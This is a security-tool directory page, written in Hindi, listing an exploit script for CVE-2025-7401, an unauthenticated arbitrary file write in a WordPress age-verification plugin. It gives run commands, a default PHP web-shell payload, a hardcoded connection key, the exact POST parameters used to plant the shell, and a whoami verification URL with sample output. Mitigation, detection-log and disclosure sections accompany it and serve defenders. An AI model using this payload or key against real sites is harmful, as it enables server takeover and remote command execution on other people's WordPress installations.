Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-7401 — वर्डप्रेस के लिए प्रीमियम आयु सत्यापन / प्रतिबंध <= 3.0.2 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना और लिखना | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-7401
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2025-7401

CVE-2025-7401

वर्डप्रेस के लिए प्रीमियम आयु सत्यापन / प्रतिबंध <= 3.0.2 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना और लिखना

रिपॉजिटरी देखें
2110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ना और लिखना

🧾 Premium Age Verification / Restriction for WordPress <= 3.0.2 — बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ना और लिखना

📝 विवरण

"Premium Age Verification / Restriction for WordPress" प्लगइन में remote_tunnel.php में एक अपर्याप्त रूप से संरक्षित रिमोट सपोर्ट एंडपॉइंट होता है। प्रभावित संस्करणों (3.0.2 तक सम्मिलित) में, इस एंडपॉइंट का दुरुपयोग बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ने और लिखने के लिए किया जा सकता है। सफल शोषण से संवेदनशील जानकारी उजागर हो सकती है या रिमोट कोड निष्पादन संभव हो सकता है।

  • CVE: CVE-2025-7401
  • CVSS: 9.8 (गंभीर)

⚙️ स्क्रिप्ट अवलोकन

  • स्क्रिप्ट नाम: CVE-2025-7401.py
  • उद्देश्य: अधिकृत सुरक्षा पेशेवरों के लिए एक परीक्षण उपकरण जो कमजोर प्लगइन एंडपॉइंट में फ़ाइल लेखन व्यवहार को मान्य करता है। स्क्रिप्ट लक्ष्य को सामान्यीकृत करती है, उपयोगकर्ता-आपूर्ति किए गए PHP स्निपेट को एन्कोड करती है, फ़ाइल लिखने का प्रयास करने के लिए कमजोर एंडपॉइंट पर एक POST भेजती है, और वैकल्पिक रूप से वेब-सुलभ फ़ाइल पथ की पुष्टि करती है।

▶️ त्वरित उपयोग उदाहरण

root@kitploit:~
# Basic (uses default connection key and default PHP shell)
python CVE-2025-7401.py -u example.com

# Use HTTPS and custom connection key, skip verification
python CVE-2025-7401.py -u https://target.example -key YOUR_KEY --no-verify

# Custom PHP payload (authorized testing only)
python CVE-2025-7401.py -u target.com -shell '<?= system($_GET["cmd"]); ?>'

🧭 कमांड-लाइन विकल्प


📋 विस्तृत स्क्रिप्ट व्यवहार (चरण-दर-चरण)


📌 अपेक्षित आउटपुट और उनके अर्थ


🛡️ शमन और सिफारिशें

  • प्लगइन को तुरंत विक्रेता-प्रदत्त पैच किए गए संस्करण में अपग्रेड करें।
  • प्रमाणीकरण और उचित प्राधिकरण जाँच के साथ रिमोट सपोर्ट कार्यों तक पहुँच प्रतिबंधित करें।
  • सर्वर-साइड सभी उपयोगकर्ता-आपूर्ति फ़ाइल पथों और फ़ाइल सामग्री को सैनिटाइज़ और मान्य करें।
  • वेब रूट में वेब उपयोगकर्ता को निष्पादन योग्य फ़ाइलें बनाने से रोकने के लिए सख्त फ़ाइल-सिस्टम अनुमतियाँ लागू करें।
  • remote_tunnel.php पर संदिग्ध अनुरोधों को पहचानने और ब्लॉक करने के लिए WAF नियम तैनात करें।

🔎 पहचान और फोरेंसिक

  • POST अनुरोधों के लिए वेबसर्वर लॉग का निरीक्षण करें: /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php पैरामीटर action=save_file, file, file_content के साथ।
  • प्लगइन निर्देशिका में remote_init.php जैसी अप्रत्याशित फ़ाइलें खोजें।
  • POST बॉडी में base64-एन्कोडेड पेलोड देखें।
  • फ़ाइल परिवर्तनों के टाइमस्टैम्प को संदिग्ध अनुरोधों से संबद्ध करें।

🤝 जिम्मेदार प्रकटीकरण

यदि आप किसी तृतीय-पक्ष इंफ्रास्ट्रक्चर पर यह भेद्यता खोजते हैं:

  • उत्पादन प्रणालियों का शोषण या परिवर्तन न करें।
  • साइट स्वामी या प्लगइन विक्रेता से निजी और सुरक्षित रूप से संपर्क करें।
  • विक्रेता को पुनरुत्पादन योग्य चरण प्रदान करें और किसी भी सार्वजनिक खुलासे से पहले उपचार के लिए उचित समय दें।

⚖️ कानूनी और सुरक्षा नोटिस

अनधिकृत भेद्यता परीक्षण उपकरणों का उपयोग कई क्षेत्राधिकारों में अवैध है। यह रिपॉजिटरी और स्क्रिप्ट केवल रक्षात्मक अनुसंधान, अधिकृत परीक्षण और समन्वित भेद्यता प्रकटीकरण के लिए है। जिन प्रणालियों के आप स्वामी नहीं हैं, उनका परीक्षण करने से पहले हमेशा स्पष्ट लिखित अनुमति प्राप्त करें।


❗ अस्वीकरण

लेखक और योगदानकर्ता सूचना या उपकरणों के दुरुपयोग के लिए कोई जिम्मेदारी स्वीकार नहीं करते हैं। इस सामग्री का उपयोग केवल कानूनी और नैतिक सीमाओं के भीतर करें।


द्वारा: Nxploited ( Khaled Alenazi )

टूल डाउनलोड करें
फ़्लैगप्रकारडिफ़ॉल्टविवरण
-u, --urlstringआवश्यकलक्ष्य डोमेन या आंशिक URL। आवश्यक होने पर स्क्रिप्ट प्लगइन एंडपॉइंट जोड़ देगी। उदाहरण: example.com, https://example.com, example.com/wp-content/plugins/age-restriction/।
-key, --keystring330489965d8266a739442ef890f57805रिमोट सपोर्ट एंडपॉइंट द्वारा उपयोग की जाने वाली कनेक्शन कुंजी। आवश्यक होने पर लैब लक्ष्यों के लिए ओवरराइड करें।
-shell, --shellstring<?= system($_GET["cmd"]); ?>फ़ाइल सामग्री के रूप में इंजेक्ट करने के लिए PHP स्निपेट। केवल अधिकृत परीक्षण के लिए बदलें।
--no-verifyflagfalseयदि मौजूद है, तो स्क्रिप्ट लिखी गई फ़ाइल का वैकल्पिक GET सत्यापन नहीं करेगी।
चरणक्रियाविवरण
1इनपुट सामान्यीकरणउपयोगकर्ता इनपुट (डोमेन या आंशिक पथ) स्वीकार करता है। स्कीम सुनिश्चित करता है (http:// यदि गायब है), डुप्लिकेट स्लैश हटाता है, और यदि एंडपॉइंट मौजूद नहीं है तो /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php जोड़ता है।
2हेडर निर्माणयथार्थवादी HTTP अनुरोध हेडर बनाता है (घूमता हुआ user-agent चयन, Accept, Referer, Content-Type)।
3पेलोड एन्कोडिंगदिए गए PHP स्निपेट को Base64-एन्कोड करता है और उसे file_content में रखता है।
4POST एक्सप्लॉइट अनुरोधसामान्यीकृत remote_tunnel.php एंडपॉइंट पर application/x-www-form-urlencoded के माध्यम से connection_key, action=save_file, file (सर्वर पथ), और file_content भेजता है।
5प्रतिक्रिया पार्सिंगप्रतिक्रिया बॉडी से JSON पार्स करने का प्रयास करता है। यदि JSON मौजूद है, तो status और file_path प्रिंट करता है; अन्यथा साफ की गई कच्ची प्रतिक्रिया प्रिंट करता है।
6सत्यापन (वैकल्पिक)यह जांचने के लिए कि इंजेक्ट की गई फ़ाइल सुलभ है और सामग्री लौटाती है, /wp-content/plugins/age-restriction/modules/remote_support/remote_init.php?cmd=whoami पर GET का प्रयास करता है। --no-verify के माध्यम से वैकल्पिक।
7रिपोर्टिंगउपयोग किए गए एंडपॉइंट, HTTP स्थिति, पार्स किया गया JSON (यदि कोई हो), अपेक्षित शेल URL, और छोटा किया गया सत्यापन आउटपुट (सफल होने पर) सहित एक संरचित, मानव-पठनीय रिपोर्ट प्रिंट करता है।
आउटपुट फ़ील्डअर्थउदाहरण
लक्ष्य एंडपॉइंटसंपर्क किया गया अंतिम सामान्यीकृत URL (remote_tunnel.php का पूर्ण पथ)।http://example.com/wp-content/.../remote_tunnel.php
HTTP स्थिति कोडPOST अनुरोध से HTTP प्रतिक्रिया कोड। 200 अक्सर संकेत देता है कि अनुरोध संसाधित हो गया।200
प्रतिक्रिया JSON स्थितियदि एंडपॉइंट JSON लौटाता है, तो status फ़ील्ड सफलता/विफलता की रिपोर्ट करता है।valid
प्रतिक्रिया JSON file_pathएंडपॉइंट द्वारा लौटाया गया सर्वर-साइड पथ जो दिखाता है कि उसने फ़ाइल कहाँ लिखी (सूचनात्मक)।/var/www/html/wp-content/.../remote_init.php
कच्ची प्रतिक्रियागैर-JSON प्रतिक्रिया बॉडी (साफ की गई) जैसे PHP नोटिस या संदेश।Notice: ...
शेल URL (अपेक्षित)वह सार्वजनिक URL जहाँ इंजेक्ट की गई फ़ाइल सुलभ होगी। केवल अधिकृत परीक्षणों में सत्यापन के लिए उपयोग करें।http://example.com/wp-content/.../remote_init.php?cmd=whoami
सत्यापन HTTP स्थितिवैकल्पिक GET सत्यापन की HTTP स्थिति।200
सत्यापन बॉडी (छोटा किया गया)सत्यापन प्रतिक्रिया बॉडी के पहले N अक्षर (कमांड आउटपुट देखने के लिए उपयोगी)।www-data